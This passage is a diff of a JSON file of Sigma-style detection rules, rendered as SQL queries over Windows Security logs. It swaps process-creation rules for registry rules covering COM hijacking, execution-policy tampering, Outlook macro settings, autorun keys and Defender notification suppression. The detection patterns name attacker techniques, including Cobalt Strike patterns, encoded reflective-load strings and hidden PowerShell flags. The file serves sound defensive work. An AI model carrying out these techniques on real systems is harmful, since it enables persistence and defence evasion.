"author": "frack113", + "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "ViberPC updater calls this binary with the following commandline \"ie4uinit.exe -ClearIconCache\"" + "Probable legitimate applications. If you find these please add them to an exclusion list" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ie4uinit.exe' ESCAPE '\\' OR OriginalFileName = 'IE4UINIT.EXE') AND NOT (((CurrentDirectory LIKE 'c:\\\\windows\\\\system32\\\\' ESCAPE '\\' OR CurrentDirectory LIKE 'c:\\\\windows\\\\sysWOW64\\\\' ESCAPE '\\')) OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' 
OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%appdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ie4uinit.yml" + "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" }, { - "title": "Use of Pcalua For Execution", - "id": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", + "title": "Potential PowerShell Execution Policy Tampering", + "id": "fad91067-08c5-4d1a-8d8c-d96a21b37814", "status": "experimental", - "description": "Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.", - "author": "Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use by a via a batch script or by an administrator." 
+ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' AND CommandLine LIKE '% -a%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy' ESCAPE '\\') AND (NewValue LIKE '%Bypass%' ESCAPE '\\' OR NewValue LIKE '%RemoteSigned%' ESCAPE '\\' OR NewValue LIKE '%Unrestricted%' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_pcalua.yml" + "filename": "registry_set_powershell_execution_policy.yml" }, { - "title": "Suspicious PowerShell Command Line", - "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", - "status": "test", - "description": "Detects the PowerShell command lines with special characters", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", + "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", + "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "status": "experimental", + "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Unlikely", - "Amazon SSM Document Worker", - "Windows Defender ATP" + "Unknown" ], 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT (ParentProcessName LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*' AND (CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" + "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" }, { - "title": "Potential UAC Bypass Via Sdclt.EXE", - 
"id": "40f9af16-589d-4984-b78d-8c2aec023197", - "status": "test", - "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Wow6432Node CurrentVersion Autorun Keys Modification", + "id": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%sdclt.exe' ESCAPE '\\' AND IntegrityLevel = 'High')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR 
TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewProcessName LIKE '%C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Wow6432Node\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\\\\%' ESCAPE '\\') OR (NewValue LIKE '%-A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\' OR NewValue = 'grpconv -o' OR NewValue LIKE '%C:\\\\Program Files%' ESCAPE '\\' AND NewValue LIKE '%\\\\Dropbox\\\\Client\\\\Dropbox.exe%' ESCAPE '\\' AND NewValue LIKE '% /systemstartup%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\\\NoExplorer' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}' ESCAPE '\\' OR TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{7037b699-7382-448c-89a7-4765961d2537}' ESCAPE '\\') AND NewValue LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\' AND NewValue LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common 
Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewValue LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\\\windowsdesktop-runtime-%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\VC\\_redist.x64.exe' ESCAPE '\\' AND NewValue LIKE '%}\\\\VC\\_redist.x64.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\winsdksetup.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AspNetCoreSharedFrameworkBundle-%' ESCAPE '\\') AND NewValue LIKE '% /burn.runonce' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_sdclt.yml" + "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml" }, { - "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", - "id": "b66474aa-bd92-4333-a16c-298155b120df", - "status": "experimental", - "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. 
This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", - "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", + "title": "Hiding User Account Via SpecialAccounts Registry Key", + "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", + "status": "test", + "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1564.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_schtasks_powershell_persistence.yml" + "filename": "registry_set_special_accounts.yml" }, { - "title": "Suspicious Kernel Dump Using Dtrace", - "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", - "status": "test", - "description": "Detects suspicious way to dump the kernel on Windows systems using 
dtrace.exe, which is available on Windows systems since Windows 10 19H1", - "author": "Florian Roth (Nextron Systems)", + "title": "Activate Suppression of Windows Security Center Notifications", + "id": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "status": "experimental", + "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", + "author": "frack113", + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\UX Configuration\\\\Notification\\_Suppress' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_dtrace_kernel_dump.yml" + "filename": "registry_set_suppress_defender_notifications.yml" }, { - "title": "CobaltStrike Process Patterns", - "id": "f35c5d71-b489-4e22-a115-f003df287317", + "title": "Suspicious Application Allowed Through Exploit Guard", + "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", "status": "experimental", - "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - 
"attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%\\\\cmd.exe /C whoami%' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Temp%' ESCAPE '\\') OR ((CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\whoami.exe%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\runonce.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1%' ESCAPE '\\' AND (ParentCommandLine LIKE '%/C whoami%' ESCAPE '\\' OR ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR ParentCommandLine LIKE '%chrome-extension://%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" + "filename": 
"registry_set_exploit_guard_susp_allowed_apps.yml" }, { - "title": "Pingback Backdoor Activity", - "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", + "title": "PowerShell as a Service in Registry", + "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "description": "Detects that a powershell code is written to the registry as a service.", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_pingback_backdoor.yml" + "filename": "registry_set_powershell_as_service.yml" }, { - "title": "Mshtml DLL RunHTMLApplication Abuse", - "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", - "status": "experimental", - "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Outlook Macro Execution Without Warning Setting Enabled", + "id": 
"e3b50fa5-3c3f-444e-937b-0a99d33731cd", + "status": "test", + "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", + "author": "@ScoubiMtl", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + "filename": "registry_set_office_outlook_enable_macro_execution.yml" }, { - "title": "Compress Data and Lock With Password for Exfiltration With 7-ZIP", - "id": "9fbf5927-5261-4284-a71d-f681029ea574", - "status": "test", - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "title": "Disable Windows Security Center Notifications", + "id": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", + "status": "experimental", + "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate activity is expected since compressing files with a password is common." 
+ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND CommandLine LIKE '% -p%' ESCAPE '\\' AND (CommandLine LIKE '% a %' ESCAPE '\\' OR CommandLine LIKE '% u %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Windows\\\\CurrentVersion\\\\ImmersiveShell\\\\UseActionCenterExperience' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_7zip_password_compression.yml" + "filename": "registry_set_disable_security_center_notifications.yml" }, { - "title": "Suspicious Script Execution From Temp Folder", - "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", + "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", "status": "experimental", - "description": "Detects a suspicious script executions from temporary folder", - "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", - "tags": [ - "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Administrative scripts" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_susp_script_exec_from_temp.yml" - }, - { - "title": "PowerShell Base64 Encoded Reflective Assembly Load", - "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", - "status": "test", - "description": "Detects base64 encoded .NET reflective loading of Assembly", - "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027", - "attack.t1620" + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE 
